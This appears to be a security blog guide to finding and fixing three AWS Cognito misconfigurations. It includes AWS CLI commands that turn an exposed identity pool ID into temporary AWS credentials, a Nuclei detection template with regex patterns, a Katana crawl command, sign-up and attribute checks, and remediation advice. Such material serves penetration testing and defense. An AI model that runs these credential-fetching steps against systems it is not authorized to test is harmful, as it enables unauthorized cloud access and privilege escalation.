Hunting for AWS Cognito Security Misconfigurations: A Guide to Uncovering Hidden Dangers
Introduction
AWS Cognito is a cloud-based identity and access management (IAM) solution that allows developers to add user sign-up and sign-in features to their web and mobile applications. However, misconfigurations in AWS Cognito can lead to unauthorized access to AWS services, authentication bypass, and privilege escalation.
Security Misconfiguration #1: Unauthorized Access to AWS Services due to Liberal AWS Credentials
One of the most critical misconfigurations is exposing sensitive markers in JavaScript files, such as identityPoolId, userPoolWebClientId, and aws_cognito_identity_pool_id. These hardcoded IDs can be used to fetch temporary AWS credentials, allowing unauthorized access to AWS services.
Detection
To detect this misconfiguration, use a combination of keyword searches and regex patterns to identify sensitive markers in HTTP responses. For example:
aws_cognito_identity_pool_id:”us-west-2:<REDACTED>”, was found in https://stage.blah.net/static/js/main.36d14ee0.chunk.js
Exploitation
To exploit this misconfiguration, use the AWS CLI to fetch temporary AWS credentials using the exposed identityPoolId:
aws cognito-identity get-id --identity-pool-id "us-west-2:5<REDACTED>" --region "us-west-2"
Output:
{
"IdentityId": "us-west-2:6f<REDACTED>"
}
aws cognito-identity get-credentials-for-identity --identity-id "us-west-2:6f<REDACTED>" --region "us-west-2"
Output:
{
"IdentityId": "us-west-2:6f<REDACTED>",
"Credentials": {
"AccessKeyId": "<REDACTED>",
"SecretKey": "<REDACTED>",
"SessionToken": "...",
"Expiration": "<REDACTED>"
}
}
With these temporary AWS credentials, enumerate permissions associated with the credentials using tools such as Enumerate-iam or Scout Suite.
Nuclei YAML File
Here’s a Nuclei YAML file to automate the detection process:
id: aws-cognito-misconfiguration-markers
info:
name: AWS Cognito Misconfiguration Markers
author: Coastlincyber
severity: high
description: Detects potential AWS Cognito misconfigurations by searching for sensitive markers in JavaScript files.
reference: https://www.yassineaboukir.com/talks/NahamConEU2022.pdf
tags: aws,cognito,misconfiguration,javascript
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: or
matchers:
- type: word
part: body
words:
- 'identityPoolId'
- 'cognitoIdentityPoolId'
- 'userPoolWebClientId'
- 'userPoolId'
- 'aws_user_pools_id'
- 'aws_cognito_identity_pool_id'
condition: or
- type: word
part: body
words:
- 'AWSCognitoIdentityProviderService'
- 'CognitoIdentityCredentials'
- 'AWS.CognitoIdentityServiceProvider'
- 'cognitoUser'
condition: or
extractors:
- type: regex
part: body
regex:
- '(us|ap|ca|cn|eu|sa)-[a-z]+-\d:[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}'
Katana Command
To automate the detection and exploitation of this misconfiguration, use the following Katana command:
katana -u https://stage.blah.net/ -jsl -rl 50 | nuclei -t ./aws-cognito-misconfiguration-markers.yaml
Security Misconfiguration #2: Authentication Bypass due to Enabled Signup API Action
Another common misconfiguration is enabling the Signup API action for user pools. This allows attackers to create new users and access AWS services.
Detection
To detect this misconfiguration, use the AWS CLI to test the Signup API endpoint:
aws cognito-idp sign-up --client-id <client-id> --username <email-address> --password <password> --region <region>
If the request is successful, it indicates that the Signup API action is enabled.
Exploitation
Once the Signup API action is enabled, an attacker can create a new user and potentially access AWS services using the temporary credentials. The specific exploitation steps would depend on the configuration of the user pool and associated IAM roles.
Security Misconfiguration #3: Privilege Escalation through Writable User Attributes
AWS Cognito allows users to update their own user attributes. However, if the attributes are writable by default, an attacker can update their own attributes to gain elevated privileges.
Detection
To detect this misconfiguration, use the AWS CLI to fetch user attributes and test if they are writable:
aws cognito-idp get-user --region <region> --access-token <access-token>
Examine the output to identify which attributes are writable.
Exploitation
Once a writable attribute is identified, an attacker can update it to potentially gain elevated privileges. For example, if a custom attribute is used to determine user roles, and that attribute is writable, an attacker could modify it to assign themselves a higher-privileged role.
The specific exploitation steps would depend on how the application uses these attributes for authorization decisions.
Recommendations for Developers
To avoid these security misconfigurations, follow these guidelines:
- Remove sensitive details from server responses, including Cognito Identity Pool Id.
- Disable Signup on AWS Cognito if not required.
- Disable unauthenticated role if not required.
- Review IAM policy attached to the authenticated and unauthenticated role to ensure least privilege access.
- Evaluate all user attributes and disable writing permission if not necessary.
- Remember that the email attribute value may hold an unverified email address.
- Implement additional security measures such as multi-factor authentication (MFA) where appropriate.
- Regularly audit and monitor AWS Cognito configurations and usage patterns.
Conclusion
AWS Cognito security misconfigurations can have devastating consequences for applications and users. By following the guidelines outlined in this post, developers can identify and remediate common misconfigurations, ensuring the security and integrity of their applications. Remember to stay vigilant and continuously monitor your AWS Cognito applications for potential security threats. Regular security assessments and penetration testing can help identify vulnerabilities before they can be exploited by malicious actors.
References